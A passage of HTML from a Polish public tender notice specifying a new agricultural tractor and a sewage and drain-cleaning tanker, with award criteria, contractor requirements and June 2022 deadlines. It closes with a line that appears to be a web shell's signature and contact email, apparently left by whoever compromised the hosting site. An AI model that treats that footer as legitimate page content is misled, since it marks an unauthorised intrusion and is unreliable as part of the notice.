class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości na od daty bezusterkowego protokolarnego odbioru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa fabrycznie nowego ciągnika rolniczego (rok produkcji 2021 r. lub nowszy) Przedmiot zamówienia winien spełniać n/w parametry techniczne: <br/>1) Silnik: wysokoprężny, 4 lub 6 cylindrowy z turboładowaniem chłodzony cieczą spełniający normy emisyjności spalin STAGE V, o mocy od 135 KM do 145 KM, o pojemności od 4100-6800 cm3 <br/>2) Kabina: 6-słupkowa z klimatyzacją i ogrzewaniem, drzwi kabiny otwierane z prawej <br/>i lewej strony, szyba tylna uchylna, wycieraczka przedniej i tylnej szyby, siedzenie kierowcy pneumatyczne, siedzenie pasażera, rejestracja ciągnika na 2 osoby, <br/>3) Skrzynia biegów: mechaniczna, synchronizowana o przełożeniach minimum 16 przód i 16 tył, <br/>4) Sprzęgło: tarczowe suche <br/>5) Układ napędowy: 4x4 z blokadą mechanizmu różnicowego załączanego przyciskiem, <br/>6) Układ hamulcowy: tarczowy mokry, hamulec ręczny mokry tarczowy sterowany dźwignią, <br/>7) WOM tylny:540/540E/1000/1000E lub 540/540E/1000 <br/>8) Pompa hydrauliczna: niezależna o wydajności minimum 70l/min i ciśnieniu roboczym na szybkozłączu minimum 20MPa lub pompa zębata o wydajności 113 l/min <br/>9) Udźwig podnośnika tylnego: minimum 6 900kg, <br/>10) Sterowanie hydrauliką: elektrohydrauliczne, <br/>11) Zewnętrzne sterowanie podnośnikiem: przyciskami na błotnikach, <br/>12) Rozdzielacz hydrauliki: tył: 6+1 przód : 4, <br/>13) Pneumatyka: jednoobwodowa i dwuobwodowa fabrycznie zamontowana, <br/>14) Układ kierowniczy: hydrostatyczny z oddzielnym układem hydraulicznym i wspomaganiem, <br/>15) Ogumienie: przód minimum 420/70r24 spawane felgi, tylne minimum 520/70r38 spawane felgi, <br/>16) Zaczep tylny: transportowy na sworzeń lub automatyczny <br/>17) Zaczep tylny dolny: Typu piton-fix lub hitch o dopuszczalnym obciążeniu pionowym minimum 3000kg na hak lub zaczep kulowy K80 o dopuszczalnym obciążeniu pionowym minimum 3000kg lub zaczep kulowy K80 o dopuszczalnym obciążeniu pionowym minimum 3000kg, <br/>18) Tylny TUZ: kategorii II z hakami i 2 siłownikami pomocniczymi , <br/>19) Przedni TUZ: o udźwigu minimum 2500kg, oryginalny stosowany przez producenta, <br/>20)Przedni WOM: lewoobrotowy (stojąc przodem do ciągnika) końcówka 6-rowkowa, obroty: 540/1000 obr/min. <br/>21) Zbiornik paliwa: minimum 220 litrów, <br/>22) Instalacja elektryczna: 12V, akumulator min. 155Ah, alternator min. 200A, <br/>23) Deska rozdzielcza: powinny znajdować się wskaźnik: liczby motogodzin, poziomu paliwa, temperatury cieczy chłodzącej, ciśnienia oleju, obrotomierz <br/>24) Wyposażenie: przednie i tylne lampy robocze, światło ostrzegawcze obrotowe- 2 szt. gaśnica, trójkąt ostrzegawczy, <br/>25) Maszyna: fabrycznie nowa, nieużywana, sprawna, nigdy wcześniej nie rejestrowana ciągnik rok produkcji 2021,2022 <br/>26) Wszystkie podzespoły montowane fabrycznie, <br/>27) Okres gwarancji: udzielony przez Sprzedawcę minimum 12 miesięcy bez limitu motogodzin, serwis gwarancyjny sprawowany bezpośrednio przez Sprzedającego, <br/>28) Dostarczony ciągnik musi być wyposażony w następujące dokumenty: a) świadectwo homologacji na terenie RP na 2 os. b) gwarancje, c) fabryczne instrukcje obsługi w języku polskim wraz ze wszystkimi dokumentami niezbędnymi do prawidłowej eksploatacji <br/>d) książki serwisowe w języku polskim. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16700000-2 - Ciągniki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości na od daty bezusterkowego protokolarnego odbioru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa wozu specjalnego asenizacyjnego z funkcją wuko niezbędnego do obsługi (udrażniania) sieci<br/>kanalizacyjnej oraz transportu ścieków na oczyszczalnię<br/>Zamówienie obejmuje zakup z dostawą wozu specjalnego (asenizacyjnego) z funkcją wuko z możliwością agregowania do<br/>ciągnika rolniczego opisanego w cz. 4 zamówieni niezbędnego do obsługi (udrażniania) sieci kanalizacyjnej oraz transportu<br/>ścieków na oczyszczalnię.<br/>Specyfikacja wozu (asenizacyjnego) specjalnego:<br/>1. Zbiornik o pojemności 10 000 l<br/>2. Zbiornik oraz dennice zbiornika wykonane z blachy gr. min. 5mm<br/>3. Zbiornik ocynkowany ogniowo<br/>4. Zbiornik podzielony na dwie części:<br/>10 000 ( 2000l na czystą wodę i 8000l na nieczystości)<br/>5. Tylny właz fi 700 mm , zamontowany na tylnej dennicy-otwierany mechanicznie<br/>6. Boczne króćce do zasysania nieczystości<br/>7. W zbiorniku na czystą wodę do napełniania złączka W75<br/>8. Zbiornik osadzony na podwoziu ramowym, w skład którego wchodzi:<br/>a. rama wykonana z kształtownika zamkniętego<br/>b. rama ocynkowana ogniowo<br/>c. zestaw kołowy jednoosiowy<br/>d. Rozmiar opon 600/55 x 26,5<br/>e. układ hamulcowy dwu przewodowy pneumatyczny<br/>f. hamulec ręczny postojowy<br/>g. błotniki ocynkowane<br/>h. mechaniczna stopa podporowa<br/>i. sprzęganie z ciągnikiem przy pomocy dolnego zaczepu hitch<br/>9. Wyposażona w zestaw składający się z kompresora oraz wysokociśnieniowej pompy<br/>10. Kompresor:<br/>a. Głębokość zasysania min. 6m - licząc od poziomu zasuwy bez zastosowania dodatkowych urządzeń wspomagających,<br/>b. Napęd 1000 obr/min<br/>c. Zabezpieczenie przed przelaniem za pomocą zaworu dwukulowego na szczycie zbiornika oraz syfonu z zaworem<br/>spustowym<br/>d. wyposażenie w manowakuometr<br/>e. dwa zawory bezpieczeństwa , nadciśnieniowy 0,05Mpa oraz podciśnieniowy -0,07Mpa<br/>f. Odolejacz-mokry filtr powietrza, tłumik<br/>g. wyposażenie w inżektor zwiększający głębokość zasysania<br/>11. Pompa ciśnieniowa:<br/>a. szybkość przepływu 120l/min<br/>b. ciśnienie 130 bar<br/>c. zawór bezpieczeństwa<br/>12. Zwijadło z wężem wysokociśnieniowym:<br/>a. długość węża wysokociśnieniowego 80mb średnica 3/4&#34;<br/>b. zwijadło hydrauliczne<br/>c. głowice kanałowe do czyszczenia kanalizacji<br/>d. pistolet wysokociśnieniowy<br/>13. Główna zasuwa spustowa w pokrywie tylnego włazu średnicy 4&#39;&#39; sterowana hydraulicznie<br/>14. Wzierniki 3szt -w zbiorniku na nieczystości<br/>15. Rurowy wskaźnik - w zbiorniku na czystą wodę<br/>16. Instalacja elektryczna 12V<br/>17. Reflektory do oświetlania miejsca pracy po obu stronach zbiornika<br/>18. Pomarańczowe światło ostrzegawcze na szczycie zbiornika<br/>19. Wąż ssawny 4&#34; o długości 6m<br/>20. Wąż strażacki W75-20m z przyłączeniami<br/>21. Uchwyt na wąż ssawny<br/>22. Walek przekaźnika mocy<br/>23. Gwarancja min. 12 miesięcy, w okresie gwarancji bezpłatne przeglądy gwarancyjne na wezwanie zamawiającego z<br/>wymianą olejów i płynów i innych wymaganych warunkami gwarancji materiałów eksploatacyjnych (jeśli dotyczy)<br/>Dostawa do Gminna Oczyszczalnia Ścieków Komunalnych w Latowiczu przy ulicy Mostowej. Dostawa wozu specjalnego w<br/>terminie nie później niż od 01.12.2022r. 20.12.2022r<br/>Wykonawca (dostawca) po podpisaniu umowy uzgodni z Zamawiającym termin dostawy w/w sprzętu (miesiąc, rok). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114000-9 - Pojazdy specjalne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości na od daty bezusterkowego protokolarnego odbioru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp Oświadczenie Wykonawcy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz.<br/>1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie składają wszyscy Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia, dotyczy także spółki cywilnej, gdzie oświadczenie składa każdy ze wspólników odrębnie, zgodnie z<br/>Załącznikiem nr 4 do SWZ.<br/>Dla cz. 1 i cz. 2 dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 100.000 zł wymaganą przez Zamawiającego<br/>wraz z dowodem uiszczenia opłaty.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp Oświadczenie Wykonawcy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową<br/>lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie składają wszyscy<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dotyczy także spółki cywilnej, gdzie oświadczenie składa każdy ze<br/>wspólników odrębnie, zgodnie z Załącznikiem nr 4 do SWZ.<br/>Dla cz. 1 i cz. 2 dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 100.000 zł wymaganą przez Zamawiającego<br/>wraz z dowodem uiszczenia opłaty.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W takim przypadku:<br/>a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego.<br/>b) Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>5. Potencjał podmiotu trzeciego. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może<br/>polegać na potencjale podmiotu trzeciego na zasadach opisanych w art. 118 – 123 ustawy Pzp. Podmiot trzeci, na potencjał<br/>którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp.<br/>6. Podwykonawstwo. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych zadań.<br/>Podwykonawca nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp<br/>UWAGA! Zabronione jest aby wykonawca mógł powierzyć podwykonawcy w całości realizację zamówienia publicznego<br/>(100% zadania), pod rygorem odrzucenia takiej oferty jako naruszającej art. 7 pkt 27 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy, rodzaj i zakres zmian do umowy oraz warunki ich wprowadzania zawarte zostały w<br/>projektach umów - załącznik nr 6A-6E do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com